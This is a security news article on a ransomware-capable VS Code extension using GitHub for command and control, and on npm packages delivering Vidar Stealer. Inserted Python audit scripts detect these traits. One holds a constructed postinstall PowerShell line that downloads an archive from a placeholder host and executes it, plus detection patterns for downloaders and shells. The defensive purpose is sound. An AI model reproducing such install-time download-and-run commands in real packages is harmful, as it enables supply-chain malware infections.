Malicious Vibe-coded VS Code extension with ransomware functionality discovered

By user, November 7, 2025

Cybersecurity researchers have flagged a malicious Visual Studio Code (VS Code) extension with basic ransomware functionality that appears to have been created with the help of artificial intelligence, or vibe-coded.

Secure Annex researcher John Tuckner, who flagged the susvsex extension, said it made no attempt to hide its malicious functionality. The extension was uploaded on November 5, 2025 by a user named ‘suspublisher18’ with the description ‘Just testing’ and the email address ‘donotsupport@example[.]com’.

The extension’s description reads: “Automatically compress, upload, and encrypt files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch.” By November 6, Microsoft had removed it from the official VS Code Extension Marketplace.

According to details shared by suspublisher18, the extension is designed to activate on any event, including when VS Code is installed or started, and then calls a function named zipUploadAndEncrypt. This function creates a ZIP archive of the target directory, uploads it to a remote server, and replaces the original files with encrypted versions.

“Fortunately, TARGET_DIRECTORY is configured as a test staging directory, so it has little impact for now, but it can be easily updated with extension releases or by commands sent through the C2 channel, which we’ll discuss next,” Tuckner said.


In addition to encryption, the malicious extension uses GitHub for command and control (C2): it polls a private GitHub repository for new commands, which it obtains by parsing the repository’s “index.html” file. The results of command execution are written back to the “requirements.txt” file in the same repository using a GitHub access token embedded in the extension’s code.
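The two traits described above, an extension that activates on every start and ships a hard-coded GitHub token it uses to poll a repository, can be checked for mechanically. The following audit script is an added example, not code from Secure Annex or from the extension; it assumes an unpacked extension directory containing package.json plus JavaScript files, and uses the classic GitHub personal-access-token format (`ghp_` followed by 36 characters), with the sample extension constructed inline.

```python
import json
import re
import tempfile
from pathlib import Path

# Classic GitHub personal access tokens are "ghp_" followed by 36 base62 characters.
GITHUB_TOKEN_RE = re.compile(r"\bghp_[A-Za-z0-9]{36}\b")
# Activation events that fire on every VS Code start, before the user does anything.
ALWAYS_ON = {"*", "onStartupFinished"}


def audit_extension(ext_dir: Path) -> list[str]:
    """Return a list of findings for one unpacked VS Code extension directory."""
    findings = []
    manifest = json.loads((ext_dir / "package.json").read_text())
    events = set(manifest.get("activationEvents", []))
    if events & ALWAYS_ON:
        findings.append("activates on start (%s)" % ", ".join(sorted(events & ALWAYS_ON)))
    # Walk every shipped JS file for embedded credentials and looping GitHub API use.
    for js in sorted(ext_dir.rglob("*.js")):
        src = js.read_text(errors="ignore")
        if GITHUB_TOKEN_RE.search(src):
            findings.append(f"{js.name}: hard-coded GitHub token")
        if "api.github.com" in src and re.search(r"setInterval|while\s*\(\s*true", src):
            findings.append(f"{js.name}: polls the GitHub API in a loop")
    return findings


def demo() -> list[str]:
    """Build a constructed extension resembling the one described and audit it."""
    ext = Path(tempfile.mkdtemp()) / "sus.ext"
    ext.mkdir()
    (ext / "package.json").write_text(json.dumps({
        "name": "constructed-sample", "activationEvents": ["*"], "main": "./extension.js"}))
    # Constructed sample: the token is a placeholder pattern, not a real credential.
    (ext / "extension.js").write_text(
        'const TOKEN = "ghp_' + "A" * 36 + '";\n'
        'setInterval(() => fetch("https://api.github.com/repos/o/r/contents/index.html",'
        ' {headers: {Authorization: "token " + TOKEN}}), 60000);\n')
    return audit_extension(ext)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```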

The GitHub account (aykhanmv) associated with the repository remains active, and the developer claims to be from the city of Baku, Azerbaijan.

“Irrelevant comments detailing functionality, README files with execution instructions, and placeholder variables are telltale signs of ‘vibe-coded’ malware,” Tuckner said. “The extension package inadvertently included a decryption tool, command and control server code, and a GitHub access key to the C2 server, which could be used by others to take over the C2.”

Trojanized npm package drops Vidar Infostealer

This disclosure comes after Datadog Security Labs discovered 17 npm packages that masqueraded as benign software development kits (SDKs) and delivered the advertised functionality, but were designed to covertly run Vidar Stealer on infected systems. This development marks the first time that an information stealer has been distributed via the npm registry.

Some packages were first flagged on October 21, 2025, with further uploads recorded the next day and on October 26, according to the cybersecurity firm, which tracks the cluster under the name MUT-4831. The packages, published by accounts named “aartje” and “saliii229911”, are:

  • abeya-tg-api
  • bael-god-admin
  • bael-god-api
  • bael-god-thanks
  • botty-fork-baby
  • cursor-ai-fork
  • cursor-app-fork
  • custom-telegram-bot-api
  • custom-tg-bot-plan
  • icon-react-fork
  • react-icon-pkg
  • sabaoa-tg-api
  • sabay-tg-api
  • sai-tg-api
  • salli-tg-api
  • telegram-bot-start
  • telegram-bot-starter

Both accounts were subsequently banned, but the packages had been downloaded at least 2,240 times before removal. Datadog noted, however, that many of these downloads may have come from automated scrapers.


The attack chain itself is very simple. It starts with a post-installation script specified in the ‘package.json’ file, which downloads a ZIP archive from an external server (a bullethost[.]cloud domain) and runs the Vidar executable contained in the archive. The Vidar 2.0 sample was found to use hardcoded Telegram and Steam accounts as dead-drop resolvers to fetch the actual C2 server address.

Some variants instead use a post-installation PowerShell script embedded directly in the package.json file to download the ZIP archive, then hand execution over to a JavaScript file that completes the remaining steps of the attack.
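The chain in the two paragraphs above (an install-time hook that downloads an archive, unpacks it and executes its contents, sometimes via an embedded PowerShell command) can be screened for before `npm install` ever runs a package's scripts. The following is an added example, not Datadog's or the packages' code; it assumes only the standard npm lifecycle hook names, and the two manifests it checks are constructed here for illustration.

```python
import re

# Lifecycle hooks that npm runs automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Signals of the chain described above: fetch an archive, unpack it, run what was inside.
DOWNLOADERS = re.compile(
    r"\b(curl|wget|iwr|Invoke-WebRequest|Start-BitsTransfer|DownloadFile|DownloadString)\b",
    re.I)
UNPACKERS = re.compile(r"\b(Expand-Archive|unzip|tar|7z)\b", re.I)
SHELLS = re.compile(r"\b(powershell|pwsh|cmd(\.exe)?|bash|sh)\b", re.I)
HANDOFF_TO_JS = re.compile(r"\bnode\s+\S+\.js\b", re.I)


def audit_scripts(manifest: dict) -> dict[str, list[str]]:
    """Return {hook: [signals]} for each lifecycle script that downloads and then
    unpacks, executes or hands off, the combination worth escalating."""
    results = {}
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        signals = []
        if DOWNLOADERS.search(cmd):
            signals.append("downloads content")
        if UNPACKERS.search(cmd):
            signals.append("unpacks archive")
        if SHELLS.search(cmd):
            signals.append("invokes shell interpreter")
        if HANDOFF_TO_JS.search(cmd):
            signals.append("hands off to local JS")
        # A plain download alone is common enough; download plus a second stage is not.
        if "downloads content" in signals and len(signals) > 1:
            results[hook] = signals
    return results


# Constructed manifests: a benign native-module build and one modelled on the chain above.
BENIGN = {"name": "native-thing", "scripts": {"install": "node-gyp rebuild"}}
SUSPICIOUS = {"name": "constructed-bot-helper", "scripts": {
    "postinstall": ('powershell -c "iwr https://cdn.example.invalid/pkg.zip -OutFile p.zip; '
                    'Expand-Archive p.zip -DestinationPath p; node p/run.js"')}}

if __name__ == "__main__":
    print(audit_scripts(BENIGN))      # {}
    print(audit_scripts(SUSPICIOUS))  # {'postinstall': [...]}
```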


“It is unclear why MUT-4831 chose to modify its post-installation script in this way,” said security researchers Tesnim Hamdouni, Ian Kretz, and Sebastian Obregoso. “One possible explanation is that diversifying implementations may give an advantage to attackers in terms of surviving detection.”

This discovery is just one in a long list of supply chain attacks targeting the open source ecosystem across npm, PyPI, RubyGems, and Open VSX, making it important for developers to perform due diligence before installing packages, review changelogs, and be aware of techniques such as typosquatting and dependency confusion.
